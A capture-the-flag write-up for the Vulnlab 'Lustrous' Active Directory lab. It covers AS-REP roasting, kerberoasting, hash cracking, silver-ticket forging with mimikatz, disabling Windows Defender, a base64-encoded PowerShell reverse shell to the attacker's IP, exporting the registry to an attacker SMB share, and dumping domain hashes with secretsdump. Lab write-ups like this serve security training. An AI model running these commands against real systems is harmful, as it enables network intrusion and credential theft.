vulnlab lustrous
Lustrous, a medium chain AD machine involved two machines, LusMS
and LusDC
, from LusMS, accessing the ftp share there were usernames which out of which ben.cox
didn’t require any pre-authentication, resulting in AS-REP roasting
, having remote access to LusMS, local administrator password found in a form of secure string that can be converted back to plaintext, getting the system account and accessing the web application on LusDC, it required kerberos authentication in order to access the site, since there was a service account with a SPN, on performing kerberoasting
, svc_web’s hash was cracked and with forging silver ticket
as tony.ward
who is a part of backup operator group, we can retrieve his password from the site and with impacket-reg
retrieving the SAM
, SYSTEM
and SECURITY
file and then dumping NTDS.dit file with LusDC hash to get domain admin
Writeup:
Enum anonymous ftp finds 3 users
After this we take a look for kerberoastable users
┌──(puck㉿kali)-[~/vulnlab/lustrous] └─$ impacket-GetNPUsers -usersfile users.txt lustrous.vl/Username@lusdC.lustrous.vl -no-pass -dc-ip 10.10.187.53 Impacket v0.12.0.dev1 - Copyright 2023 Fortra $krb5asrep$23$ben.cox@LUSTROUS.VL:6c2235fc542be350acb491b50c61c07d$a9feb90a9a6784eba15a6af651082f5e97f3805acbf9dd672bc3a74ffdf4ef8700e34fc732393af129f6779f8023711787ace5213a4d7397c06621048dcd6ced94bcc3030e> [-] User rachel.parker doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User tony.ward doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User wayne.taylor doesn't have UF_DONT_REQUIRE_PREAUTH set
.
impacket-GetUserSPNs -dc-ip 10.10.187.53 -usersfile users.txt -request lustrous.vl/'ben.cox':'Trinity1'
crack some hashes
The hash identifier for Kerberos 5, etype 23, AS-REP hashes is 18200.
The hash identifier for Kerberos 5, etype 23, TGS-REP hashes is 13100.
You can find this within the hashcat example hashes page.
hashcat -m 18200 -o cracked.txt ben.cox.hash /usr/share/wordlists/rockyou.txt
.
Do some Bloodhound analysis, to find high valuable targets
bloodhound-python -d lustrous.vl -c all -u ben.cox -p Trinity1 -ns 10.10.187.53 --dns-tcp
.
$ impacket-GetUserSPNs Lustrous.vl/ben.cox:Trinity1 -dc-ip lusdc.lustrous.vl -request-user svc_web Impacket v0.12.0.dev1 - Copyright 2023 Fortra ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation ---------------------- ------- -------- -------------------------- -------------------------- ---------- http/lusdc svc_web 2021-12-22 13:46:12.670282 2021-12-27 13:45:43.927619 http/lusdc.lustrous.vl svc_web 2021-12-22 13:46:12.670282 2021-12-27 13:45:43.927619 [-] CCache file is not found. Skipping... $krb5tgs$23$*svc_web$LUSTROUS.VL$Lustrous.vl/svc_web*$fec3e242194f52c140173bb7e0b2df73$e898fd0c2e9ea4fed53d9537a90e5c4daf043e597802909d35109f8891bc25e5a6aaaa6e2739e485425b244c3735913ff0f4426ce73c6021df92c557f4ab1eb6c481a657d26b801e18cc6af1cc789316f2045fc77e2cbaaf97aa6ae1fb7f26a0310bb149f06c2a65c3ba2315b3178d17669c8eb7a5c571f2bfaf5d0673dff09564526c9308ecc38663419cc55cc7f30ed1c7e8507f6b328284cfbf8911e9fcbfb57b4ccf0c5718e370450ab04b8c6e32fc9339fa3a3a9b349f9b6331d49a3bf080d8d1f94982d4aa87ec49de95d6efb283a196124c1b8cdd1a44c9b1201cf213a07dfb5ce2cda72465368796a991a4e25ed2165e9af342f39a06dd7acf1bcd8146036d64f8913c63c13c7c2ec8e15e3bcc364fc0a15bd8caef7ea023461fa8ddd6f734d2e5f5aa6ed2a544c09b05d653896e7a4c44d27ffba095be6aceec903378b6fc6ca41fc485fcaf5f041682a8c2a7510e23b827a542464e68002dee9cd17a5d09ca3f6b8a9d69fd34fcaa0eb35d36db5f47b9af13f8bac9ca2fe84eabb5858f8ba85864eed9b407c53426bbcde4742a66ac734365d4d72faa8d68e6db348b5e70c5abc6278dc474ab8d91fa45fc38447b470f3f5b480a3c27c34ffac8aff5e7cbed4dcb5ac4529cf42b0f3142d053879891bc224acece35f25164c38a9b2ab058bae92c0498051259c4cba97214aff005d8adba5a073be1cab0dc832abae307b04694c049bd52cf774829d4ae48c79abd188e373fb6108c351f12969e5badc2da61e0c0a0a063dbc637e08473d332fcccd8a3bbb45d5360bd2c11861fe94a290e357c18be4c2c0f849843f3e93ba81a34a1eca0661a7b24e7f3cb459cbd73a243d49b9357c70efcddabe13afa1d9778033681129046a8034b1dd26217dae4bde336b5871961623f2156515325888499f3a6cda70985981550d147f61f028040c9f6a6c78a8b9c406ca1b7d47ac14a25db13c48db0726f215c650723fd267dd9b832fda6700fc964c0df83369c4d21e475d69ac907d072b561aa6011a5bcca92d93ee834bee6619b3461bd9db8371cc6872b4adacadd07119dd3128073c03c110e1878f7d35e51eff75e15b774e5d0e7c775b94bf2a8c3dbac3ab7fa3f38670ed3b486f9c5a7245afa95550a43bd8dbd3d8923f18565a3899294dea285cc7f8e653a493283449cad01be0862053c1121563d7ebfb4e63e896e19d1216e31dde60e04e1b6ea383b7c6c8534c97c6ff9ebe5e0e5839cc0c267cebd21461b847c07285c6d99fe14b6d35b22b96f4242acd5d0668a1431d14a582b0a19a35bd657f29b230173fb9bf0a76ed88aff79947ebdc45ff4067c5aa96ccb37ff9633b9a77b4f241f8961334cbaec36007670f0e695a76c735a2cb4106ef6e2de129c964e8353b37db9d9cad57a0998979539ea8435ee2ed4ca05fbb7472e46a212a096f0bf75
.
The hash identifier for Kerberos 5, etype 23, TGS-REP hashes is 13100.
You can find this within the hashcat example hashes page.
hashcat -m 13100 -o cracked_svcweb.hash.txt svcweb.hash /usr/share/wordlists/rockyou.txt
.
winrm to lusms.lustrous.vl
evil-winrm --ip lusms.lustrous.vl -u 'ben.cox' -p 'Trinity1'
On Ben’s Desktop, we found an xml representation of a PSCredential Object file named admin.xml.
following this blog post, we can extract the cleartext data from the file
.
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> type admin.xml <Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"> <Obj RefId="0"> <TN RefId="0"> <T>System.Management.Automation.PSCredential</T> <T>System.Object</T> </TN> <ToString>System.Management.Automation.PSCredential</ToString> <Props> <S N="UserName">LUSMS\Administrator</S> <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367</SS> </Props> </Obj> </Objs> *Evil-WinRM* PS C:\Users\ben.cox\Desktop> *Evil-WinRM* PS C:\Users\ben.cox\Desktop> $user = "Administrator" *Evil-WinRM* PS C:\Users\ben.cox\Desktop> $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367" *Evil-WinRM* PS C:\Users\ben.cox\Desktop> $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367" | ConvertTo-SecureString *Evil-WinRM* PS C:\Users\ben.cox\Desktop> $cred = New-Object System.Management.Automation.PSCredential($user, $pass) *Evil-WinRM* PS C:\Users\ben.cox\Desktop> $cred.GetNetworkCredential() | Format-List UserName : Administrator Password : XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF SecurePassword : System.Security.SecureString Domain : *Evil-WinRM* PS C:\Users\ben.cox\Desktop>
logon as Administrator, and make ben.cox an admin
┌──(puck㉿kali)-[~/vulnlab/lustrous] └─$ evil-winrm --ip lusms.lustrous.vl -u 'Administrator' -p 'XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF' *Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt VL{40<redacted>48} *Evil-WinRM* PS C:\Users\Administrator\Desktop> net user puck Summer2024 /add The command completed successfully. *Evil-WinRM* PS C:\Users\Administrator\Desktop> net localgroup administrators puck /add The command completed successfully. *Evil-WinRM* PS C:\Users\Administrator\Desktop> *Evil-WinRM* PS C:\Users\Administrator\Desktop> net localgroup administrators ben.cox /add The command completed successfully.
Look around
┌──(puck㉿kali)-[~/vulnlab/lustrous] └─$ xfreerdp /u:puck /p:'Summer2024' /v:lusms.lustrous.vl /cert:ignore /rfx start edge, login to https://lusdc.lustrous.vl as ben.cox and find the secure note.
We have also the password for the service account, so we can craft a ticket for any other user. See: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets
We go and disable windows defender and upload mimikatz, in our current powershell session , where we can store a new ticket for the administrator account
set-mppreference -disablerealtimemonitoring $true iwr http://10.8.2.138/mimikatz.exe -outfile mimikatz.exe
then we use mkpsrevshell.py
python3 mkpsrevshell.py 10.8.2.138 443
.
─$ impacket-atexec 'administrator'@10.10.207.70 "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADIALgAxADMAOAAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA" Impacket v0.12.0.dev1 - Copyright 2023 Fortra [!] This will work ONLY on Windows >= Vista Password: [*] Creating task \RqYvQaAv [*] Running task \RqYvQaAv [*] Deleting task \RqYvQaAv [*] Attempting to read ADMIN$\Temp\RqYvQaAv.tmp [*] Attempting to read ADMIN$\Temp\RqYvQaAv.tmp
All in one
PS C:\temp> .\mimikatz.exe "kerberos::purge" "kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /id:1114 /target:lusdc.lustrous.vl /service:http /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /ptt /user:tony.ward" "exit" .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(commandline) # kerberos::purge Ticket(s) purge for current session is OK mimikatz(commandline) # kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /id:1114 /target:lusdc.lustrous.vl /service:http /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /ptt /user:tony.ward User : tony.ward Domain : lustrous.vl (LUSTROUS) SID : S-1-5-21-2355092754-1584501958-1513963426 User Id : 1114 Groups Id : *513 512 520 518 519 ServiceKey: e67af8b3d78df5a02eb0d57b6cb60717 - rc4_hmac_nt Service : http Target : lusdc.lustrous.vl Lifetime : 9/21/2024 6:04:01 PM ; 9/19/2034 6:04:01 PM ; 9/19/2034 6:04:01 PM -> Ticket : ** Pass The Ticket ** * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Golden ticket for 'tony.ward @ lustrous.vl' successfully submitted for current session mimikatz(commandline) # exit Bye! PS C:\temp> iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content PS C:\temp> whoami nt authority\system PS C:\temp> hostname LusMS PS C:\temp> klist Current LogonId is 0:0x3e7 Cached Tickets: (1) #0> Client: tony.ward @ lustrous.vl Server: http/lusdc.lustrous.vl @ lustrous.vl KerbTicket Encryption Type: RSADSI RC4-HMAC(NT) Ticket Flags 0x40a00000 -> forwardable renewable pre_authent Start Time: 9/21/2024 18:04:01 (local) End Time: 9/19/2034 18:04:01 (local) Renew Time: 9/19/2034 18:04:01 (local) Session Key Type: RSADSI RC4-HMAC(NT) Cache Flags: 0 Kdc Called: PS C:\temp> PS C:\temp> iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content
First we need the ntlm hash for the service account (svcweb)
┌──(puck㉿kali)-[~/vulnlab/lustrous] └─$ iconv -f ASCII -t UTF-16LE <(printf "iydgTvmujl6f") | openssl dgst -md4 MD4(stdin)= e67af8b3d78df5a02eb0d57b6cb60717
The following wmic command can be use to get the SID of tony.ward. ( or we use bloodhound for this )
C:\Windows\system32>wmic useraccount where name='tony.ward' get sid SID S-1-5-21-2355092754-1584501958-1513963426-1114
The NTLM hash we then use in the rc4 parameter
kerberos::golden /domain:lustrous.vl /user:administrator /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http /ptt
and request our target website
iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content
This gives us u
We better do not use an Administrator account for this ( meaning we need to use another target in our case tony.ward to caft a silver ticket for tony.ward
.
kerberos::golden /domain:lustrous.vl /user:tony.ward /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http /id:1114 /ptt
in Administrative cmd prompt:
C:\Windows\system32>runas.exe /noprofile /netonly /user:lustrous\ben.cox cmd.exe Enter the password for lustrous\ben.cox: Trinity1 Attempting to start cmd.exe as user "lustrous\ben.cox" ... C:\Windows\system32>
then
c:\temp>mimikatz .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # kerberos::golden /domain:lustrous.vl /user:tony.ward /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http /id:1114 /ptt User : tony.ward Domain : lustrous.vl (LUSTROUS) SID : S-1-5-21-2355092754-1584501958-1513963426 User Id : 1114 Groups Id : *513 512 520 518 519 ServiceKey: e67af8b3d78df5a02eb0d57b6cb60717 - rc4_hmac_nt Service : http Target : LusDC.lustrous.vl Lifetime : 7/27/2024 7:28:18 PM ; 7/25/2034 7:28:18 PM ; 7/25/2034 7:28:18 PM -> Ticket : ** Pass The Ticket ** * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Golden ticket for 'tony.ward @ lustrous.vl' successfully submitted for current session mimikatz # exit Bye! c:\temp>
.
c:\temp>klist Current LogonId is 0:0x4900d Cached Tickets: (1) #0> Client: tony.ward @ lustrous.vl Server: http/LusDC.lustrous.vl @ lustrous.vl KerbTicket Encryption Type: RSADSI RC4-HMAC(NT) Ticket Flags 0x40a00000 -> forwardable renewable pre_authent Start Time: 7/27/2024 19:28:18 (local) End Time: 7/25/2034 19:28:18 (local) Renew Time: 7/25/2034 19:28:18 (local) Session Key Type: RSADSI RC4-HMAC(NT) Cache Flags: 0 Kdc Called: c:\temp>powershell Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows PS C:\temp> Invoke-WebRequest -Uri http://lusdc.lustrous.vl/Internal -UseDefaultCredentials -UseBasicParsing | Select-Object -Expand Content <h2>Notes</h2> <p>Welcome, LUSTROUS\Tony.Ward!</p> <div class="table"> <td> Password Reminder </td> <td> U_cPVQ<redacted>0i1X </td> <td> lustrous_tony.ward </td> <td> <a class="btn btn-danger" href="/Internal </table> <input type="button" value="New Note" onclick="window.location.href='/Internal/CreateNote'" /> </div> <hr /> <footer> <p>© 2024 - SNotes</p> </footer> </div> </body> </html> PS C:\temp>
.
PRIVESC
Logged in as Ben powershell right click run as user tony.ward
PS C:\Users\ben.cox> whoami lustrous\tony.ward PS C:\Users\ben.cox> cd c:\temp PS C:\temp> .\RegSave.exe -t lusdc.lustrous.vl --acl [*] Identity: LocalService \_ Access Type: Allow \_ Registry Rights: -2147483648 \_ Inherited: False [*] Identity: LocalService \_ Access Type: Allow \_ Registry Rights: ReadKey \_ Inherited: False [*] Identity: BUILTIN\Administrators \_ Access Type: Allow \_ Registry Rights: 268435456 \_ Inherited: False [*] Identity: BUILTIN\Administrators \_ Access Type: Allow \_ Registry Rights: FullControl \_ Inherited: False [*] Identity: BUILTIN\Backup Operators \_ Access Type: Allow \_ Registry Rights: ReadKey \_ Inherited: False PS C:\temp> .\RegSave.exe -t lusdc.lustrous.vl -o c:\windows\tasks\ --backup [+] Exported \\lusdc.lustrous.vl\HKLM\SAM to c:\windows\tasks\3101BB00-F1ED-4F03-80F9-347F32D4F498 [+] Exported \\lusdc.lustrous.vl\HKLM\SYSTEM to c:\windows\tasks\B254B23F-CE5D-483A-9FAD-92192AF7CC4E [+] Exported \\lusdc.lustrous.vl\HKLM\SECURITY to c:\windows\tasks\2190EDEF-05BB-4DF7-B94A-729F19F83BBE PS C:\temp>
.
┌──(puck㉿kali)-[~/vulnlab/lustrous] └─$ impacket-smbclient lustrous.vl/tony.ward:U_cP<redacted>0i1X@lusdc.lustrous.vl Impacket v0.12.0.dev1 - Copyright 2023 Fortra Type help for list of commands # use C$ # shares ADMIN$ C$ IPC$ NETLOGON SYSVOL # use C$ # cd windows\tasks # ls drw-rw-rw- 0 Sat Jul 27 13:51:14 2024 . drw-rw-rw- 0 Sat May 27 20:32:06 2023 .. -rw-rw-rw- 45056 Sat Jul 27 13:51:14 2024 2190EDEF-05BB-4DF7-B94A-729F19F83BBE -rw-rw-rw- 28672 Sat Jul 27 13:51:12 2024 3101BB00-F1ED-4F03-80F9-347F32D4F498 -rw-rw-rw- 16965632 Sat Jul 27 13:51:13 2024 B254B23F-CE5D-483A-9FAD-92192AF7CC4E -rw-rw-rw- 6 Sat Jul 27 11:50:13 2024 SA.DAT # mget * [*] Downloading 2190EDEF-05BB-4DF7-B94A-729F19F83BBE [*] Downloading 3101BB00-F1ED-4F03-80F9-347F32D4F498 [*] Downloading B254B23F-CE5D-483A-9FAD-92192AF7CC4E [*] Downloading SA.DAT #
or do it this way
┌──(puck㉿kali)-[~/vulnlab/lustrous] └─$ impacket-smbserver smb . -smb2support Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed [*] Incoming connection (10.10.187.53,54551) [*] AUTHENTICATE_MESSAGE (\,LUSDC) [*] User LUSDC\ authenticated successfully [*] :::00::aaaaaaaaaaaaaaaa [*] Connecting Share(1:smb) [*] AUTHENTICATE_MESSAGE (LUSTROUS\LUSDC$,LUSDC) [*] User LUSDC\LUSDC$ authenticated successfully [*] LUSDC$::LUSTROUS:aaaaaaaaaaaaaaaa:a1abcb5128891908dd06050c91ebec30:0101000000000000002a54d31ee0da01c6fce3df3ca0410000000000010010006e0072006a00530065004b004f005800030010006e0072006a00530065004b004f00580002001000580070006f006200540046004900570004001000580070006f006200540046004900570007000800002a54d31ee0da0106000400020000000800300030000000000000000000000000400000e15257875fa1332fbc03b8a4fe3db518132560a8e7b113c3bb02a72a24cd55ff0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000 [*] AUTHENTICATE_MESSAGE (LUSTROUS\LUSDC$,LUSDC) [*] User LUSDC\LUSDC$ authenticated successfully [*] ..snip.. [*] Disconnecting Share(1:smb) [*] Closing down connection (10.10.187.53,54551) [*] Remaining connections []
.
┌──(puck㉿kali)-[~/vulnlab/lustrous] └─$ impacket-reg lustrous.vl/'tony.ward':'U_cP<redacted>0i1X'@10.10.187.53 -dc-ip 10.10.187.53 backup -o \\\\10.8.2.138\\smb Impacket v0.12.0.dev1 - Copyright 2023 Fortra [!] Cannot check RemoteRegistry status. Triggering start trough named pipe... [*] Saved HKLM\SAM to \\10.8.2.138\smb\SAM.save [*] Saved HKLM\SYSTEM to \\10.8.2.138\smb\SYSTEM.save [*] Saved HKLM\SECURITY to \\10.8.2.138\smb\SECURITY.save
now get the machine hashes
┌──(puck㉿kali)-[~/vulnlab/lustrous] └─$ impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Target system bootKey: 0x9619c4c8e8d0c1e1314ca899f5573926 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:1e<redacted>97::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information. [*] Dumping cached domain logon information (domain/username:hash) [*] Dumping LSA Secrets [*] $MACHINE.ACC $MACHINE.ACC:plain_password_hex:7c8bc87fdc872e790bbf7789dba9ca54bdcd339a4858b7f0400af019b1ea70c306ca1aa097c61c16db78634d36d95d639e9e5e9486f2ac9366898ab26783e513d475edb080e42b9aa2643b83b6fcca12a57e4232154ad8aa34c32b6d7d3182d2509d8b34990dd5c23852c0149382c412bf45352f3ae8a490a454e6bd4c64a3e441f6dbeecf5f48baedbe7ddae74dd77813392a73150fa751e33f8ac0338877c7f09e54e1baef33094f8a716cd1ccc389027d80c1b834d35edd8cb926a8ba3841ca8f6afb3fa9f53c9fb11c6483ebd1f3127725c2bb160ca325869e91e2136192b454c95bdd4b662f8596518dee210daf $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:28<redacted>54 [*] DPAPI_SYSTEM dpapi_machinekey:0x908c1b9d1eba6062f66247d016952eab010c4f62 dpapi_userkey:0xe7d85d4c5db116a07bd02c655623691eae32c387 [*] NL$KM 0000 B6 96 C7 7E 17 8A 0C DD 8C 39 C2 0A A2 91 24 44 ...~.....9....$D 0010 A2 E4 4D C2 09 59 46 C0 7F 95 EA 11 CB 7F CB 72 ..M..YF........r 0020 EC 2E 5A 06 01 1B 26 FE 6D A7 88 0F A5 E7 1F A5 ..Z...&.m....... 0030 96 CD E5 3F A0 06 5E C1 A5 01 A1 CE 8C 24 76 95 ...?..^......$v. NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695 [*] Cleaning up...
get the users hashes
┌──(puck㉿kali)-[~/vulnlab/lustrous] └─$ impacket-secretsdump lustrous.vl/'LUSDC$'@lusdc.lustrous.vl -hashes aad3b435b51404eeaad3b435b51404ee:28<redacted>54 -just-dc-user Administrator Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:b8<redacted>76::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:192dc734a2de3bc95bad85d2f4e3380a89ed9edb2341b124745d5dbf7ccdf6bd Administrator:aes128-cts-hmac-sha1-96:854da5162b192ac9e6d3e15e52d326ff Administrator:des-cbc-md5:c110a4f7f80d5d86 [*] Cleaning up...
evil win-rm to the dc
┌──(puck㉿kali)-[~/vulnlab/lustrous] └─$ evil-winrm --ip lusdc.lustrous.vl -u 'Administrator' -H 'b8<redacted>76' Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> hostname LusDC *Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\desktop *Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt VL{53<redacted>0b}
.
That was Fun !